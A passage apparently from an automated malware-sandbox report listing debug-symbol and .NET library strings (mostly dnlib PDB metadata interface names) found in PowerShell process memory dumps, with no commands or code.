                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000003.00000002.2133602889.00000000088AA000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2131065776.0000000007872000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2387421374.0000000007890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2387421374.0000000007890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
